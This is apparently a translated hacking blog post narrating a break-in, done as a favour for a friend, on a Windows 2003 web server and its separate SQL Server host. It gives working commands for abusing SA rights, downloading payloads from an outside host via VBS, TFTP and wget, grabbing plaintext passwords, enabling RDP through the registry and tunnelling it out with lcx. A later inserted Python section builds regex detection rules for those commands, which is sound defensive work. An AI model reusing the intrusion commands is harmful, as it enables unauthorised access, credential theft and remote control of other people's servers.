Site/database separation: take the intranet server first, then the target server

Source: Internet
Author: User
Tags: echo command

0x00 Environment for privilege escalation
A friend asked me to help him dump a database ~ ~ ~
Then I tried to escalate privileges.
A look at the ports showed 80 and 3389 open.
Windows 2003 x86

Since it was a database dump, you can imagine there had to be a database.

From the screenshot you can see the site and the database are on separate servers, and I naively used SA to run the add-user command.
The result: still couldn't connect ~ ~ ~ of course it wouldn't!!!
Well, there are a couple of ideas here:
First, ignore this configuration file and escalate privileges directly on the original server.
Second, use SA to take the intranet server, and from there take the original server.
Let's try the first one ~ ~

0x01 Privilege escalation on the original server
No common third-party software was installed, so the only route was an overflow exploit.
The tragedy is that basically every overflow ended the same way: either killed by the antivirus (McAfee) or it simply wouldn't run.

Well, dropped an lpk.dll on there ~ ~ ~ and moved on to the next idea.

0x02 The intranet server first

Taking the intranet server also has two lines of thought ~ ~ ~
First, don't take the server at all: read the hashes directly, crack them, and see whether the intranet machines share a password ~ ~ ~
Second, use the LCX forwarding tool to take the server, then collect information on it.
But both ideas need one thing: uploading files to the database server.
So how do you upload files to the server?
There are plenty of ways; I'll introduce the three common ones:
First, use cmd to call FTP (or tftp) to upload files (the same principle as pushing a trojan over 1433).
Second, use SQL statements to create a temporary table, write the data into it, then export it.
Third, upload with a VBS script.
Starting with the first one (someone might ask why not just use echo to write the file onto the server ~~~~ echo can only write one line at a time, and it stops as soon as it meets a > or >> symbol, so don't write files with echo ~ ~).

First set up an FTP server on your own machine.
The configuration is as follows:
Pick a folder, and put the file to be uploaded, 1.txt, in that folder.

Write the commands from cmd, one line per execution.
echo open 223.85.31.141>>test.txt   connect to the FTP server; 223.85.31.141 is your own machine's IP
echo test>>test.txt                 write the user name
echo test>>test.txt                 write the password
echo bin>>test.txt                  switch to binary transfer mode (the session below shows "Type set to I")
echo get 1.txt>>test.txt            download 1.txt from the FTP server
echo bye>>test.txt                  close the FTP connection

Execution in cmd is complete.
Then use the type command to view the contents of test.txt:
type test.txt
---------------------------------------------------------------------------------------------------------------
open 223.85.31.141
test
test
bin
get 1.txt
bye
---------------------------------------------------------------------------------------------------------------
Written successfully.
Next, call the ftp command to run these commands and download the file ~ ~ ~

The test results on my own machine are as follows:
---------------------------------------------------------------------------------------------------------------
ftp -s:test.txt
ftp> open 223.85.31.141
Connected to 223.85.31.141.
Welcome to SUS FTP Server
User (223.85.31.141:(none)):
331 Password required for test

Logged on
ftp> bin
Type set to I
ftp> get 1.txt
Port command successful
Opening data channel for file transfer.
226 Transfer complete
ftp: Received 11 bytes in 0.00 seconds 11.00 kilobytes per second.
ftp> bye
Bye
---------------------------------------------------------------------------------------------------------------


The tragedy is that when it was executed on the server, this came back:
---------------------------------------------------------------------------------------------------------------
'ftp' is not recognized as an internal or external command,
operable program or batch file.
---------------------------------------------------------------------------------------------------------------
The reason is probably that ftp.exe was removed, or the admin did something clever.

Now for the second idea: write and export with SQL statements ~ ~ ~
Originally I wanted to write the SQL statements and stored procedures myself, but I'm lazy, so I looked online for a script that does the file upload directly.

Call it good luck: found Sa-upfile 1.0 (upload files with SA permission).
Environment: SQL 2000 with SA permission; commonly used in privilege escalation.
Principle: binary import and export using textcopy.
All right, let's try it.

Really works, decisive success ~~~~~
It seems a rookie really is a rookie; so this is the legendary Sa-upfile ~ ~ ~
For the principle, read this article:
"How to upload a file remotely via SQL Server"

I'll also add VBS download and TFTP download here ~ ~ as above, once the administrator deletes ftp.exe,
you can't upload that way any more.
VBS download:
This is where the power of scripting shows ~ ~ ~
Script upload only needs ADODB.Stream support, which Windows has by default.
The upload script is as follows (again executed from cmd):
echo Set xpost=CreateObject(^"Microsoft.XMLHTTP^"):xpost.Open ^"GET^",^"http://f4ck.yueyan.net/yueyan.exe^",0:xpost.Send():Set sget=CreateObject(^"ADODB.Stream^"):sget.Mode=3:sget.Type=1:sget.Open():sget.Write(xpost.responseBody):sget.SaveToFile ^"C:\yueyan.exe^",2 >down.vbs

Then run cscript down.vbs to complete the download.

TFTP download:
TFTP download should be the easiest of these upload methods, which is why I mention it last, and I don't recommend uploading with TFTP.
Just introducing it for completeness.
The reason is that TFTP is based on UDP, and anyone who knows UDP and TCP/IP knows UDP was designed to carry small amounts of data (QQ chat messages use it). So it can only transfer small files; a wget is no problem of course ~ ~ ~ ~ but sometimes antivirus software will block the transfer ~ ~ so not recommended.

How to use it: first set up a TFTP server on your own machine.

Then execute the command on the server; one line is enough.
tftp -i <your ip> get yueyan.exe <path>\yueyan.exe
For example, to download yueyan.exe to the root of the C drive, just run
tftp -i 110.110.110.110 get yueyan.exe C:/yueyan.exe
As simple as that; if no path is given, it defaults to the system32 directory.


If you need to download more files, I recommend uploading a wget.exe.
The command is as follows:

wget http://f4ck.yueyan.com/yueyan.exe

Then uploading other files is convenient.

First, use GetPass.exe to grab the plaintext password directly.
---------------------------------------------------------------------------------------------------------------
Username: administrator
Logondomain: win-qub8glt3hkb
password: 000
---------------------------------------------------------------------------------------------------------------
Seriously ~~~~ 000 as the password. Let's try it on the original server.


Didn't work. Fine, I admit my luck was bad today.
Here's a decent solution: check whether the server has 3389 enabled.
Use netstat -an to see whether 3389 is open, and query the remote terminal port from cmd:
reg query "hklm\system\currentcontrolset\control\terminal server\winstations\rdp-tcp" /v portnumber
Since we have system privileges, it can be enabled directly from the command line.
Enable 3389:
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f

Once it's open, just forward the port ~ ~

On your own machine run: lcx -listen 51 33891
On the server run: lcx -slave 223.85.31.141 51 127.0.0.1 3389
Then connect to 127.0.0.1:33891
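Everything from the echo-built FTP script through the reg add and the lcx forward is run through cmd on the database server, which is exactly what a defender can catch: each of those commands appears as a process-creation event (Sysmon Event ID 1, or Windows Security 4688 with command-line auditing enabled), with the database engine as the parent. The Python below is an added example, not part of the original post or of any tool it mentions. It runs a small set of regex rules modelled on the commands in this write-up over constructed "parent|command line" records; the log format, the rule names and the sample records are all assumptions made for the example.

```python
import re
from typing import Any, Dict, List, Tuple

# Constructed sample process-creation records in the form "parent|command line",
# modelled on the commands in the write-up. They are NOT logs from any real system.
SAMPLE_LOGS: List[str] = [
    "sqlservr.exe|cmd.exe /c echo open 223.85.31.141>>test.txt",
    "sqlservr.exe|cmd.exe /c echo get 1.txt>>test.txt",
    "sqlservr.exe|cmd.exe /c ftp -s:test.txt",
    "sqlservr.exe|cmd.exe /c cscript down.vbs",
    "sqlservr.exe|cmd.exe /c tftp -i 110.110.110.110 get yueyan.exe C:/yueyan.exe",
    'sqlservr.exe|cmd.exe /c reg add "hklm\\system\\currentcontrolset\\control\\terminal server" '
    "/v fdenytsconnections /t reg_dword /d 0 /f",
    "sqlservr.exe|cmd.exe /c lcx -slave 223.85.31.141 51 127.0.0.1 3389",
    "explorer.exe|notepad.exe C:\\notes.txt",
    "svchost.exe|cmd.exe /c echo hello > greeting.txt",
]

# Rule names are invented for this example. Each regex mirrors one step of the
# write-up: staging an FTP script with echo, running ftp -s:, a tftp -i get,
# a cscript-launched .vbs downloader, setting fDenyTSConnections to 0, and lcx.
RULES: List[Tuple[str, Any]] = [
    ("ftp_script_staging", re.compile(r"\becho\s+(open|user|get|put|bin|bye)\b.*>>", re.I)),
    ("ftp_scripted_run", re.compile(r"\bftp(\.exe)?\s+-s:", re.I)),
    ("tftp_binary_get", re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("script_host_downloader", re.compile(r"\b[cw]script(\.exe)?\s+\S+\.vbs\b", re.I)),
    ("rdp_enable_via_reg", re.compile(
        r"\breg(\.exe)?\s+add\b.*terminal server.*fdenytsconnections.*/d\s+0\b", re.I)),
    ("lcx_port_forward", re.compile(r"\blcx(\.exe)?\s+-(slave|listen|tran)\b", re.I)),
]

# A database engine spawning cmd.exe is the xp_cmdshell footprint the whole
# write-up relies on, so it gets its own rule regardless of the command text.
DB_ENGINE_PARENTS = {"sqlservr.exe"}
SHELL_RE = re.compile(r"\bcmd(\.exe)?\b", re.I)


def analyze_line(record: str) -> Dict[str, Any]:
    """Split one 'parent|cmdline' record and return the rule names it triggers."""
    parent, _, cmdline = record.partition("|")
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if parent.lower() in DB_ENGINE_PARENTS and SHELL_RE.search(cmdline):
        hits.insert(0, "db_engine_spawned_shell")
    return {"parent": parent, "cmdline": cmdline, "hits": hits}


def analyze_logs(records: List[str]) -> List[Dict[str, Any]]:
    """Return only the records that triggered at least one rule."""
    results = (analyze_line(r) for r in records)
    return [r for r in results if r["hits"]]


def summarize(records: List[str]) -> Dict[str, int]:
    """Count hits per rule, the view an alert dashboard would show."""
    counts: Dict[str, int] = {}
    for r in analyze_logs(records):
        for name in r["hits"]:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for r in analyze_logs(SAMPLE_LOGS):
        print(f"{r['parent']:<14} {', '.join(r['hits']):<45} {r['cmdline']}")
    print(summarize(SAMPLE_LOGS))
```

On the constructed records, the two benign lines (notepad, and a plain echo under svchost) trigger nothing, while all seven commands spawned by sqlservr.exe trigger the parent rule plus the matching technique rule. The parent-process rule is the one that survives the author's own workaround: even when ftp.exe has been removed and the attacker switches to cscript or tftp, the database engine launching a shell is still the common signal.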


OK ~ ~ ~ finally got in ~ ~ ~

0x03 From the intranet, slowly take the original server
With one server taken, now bring out my artifact ~~~ h-scan

And artifact number two ~~~ sqltool
Privilege escalation ~ ~ ~
Taking servers like crazy ~ ~ ~ Why take servers? To gather information.
Take a server, grab that server's passwords ~ ~ ~
Collect several passwords ~ ~ ~
Then log on to the original machine.
Logged in successfully.

Actually there's no real reason to take this server; the whole point is to escalate privileges ~ ~ ~
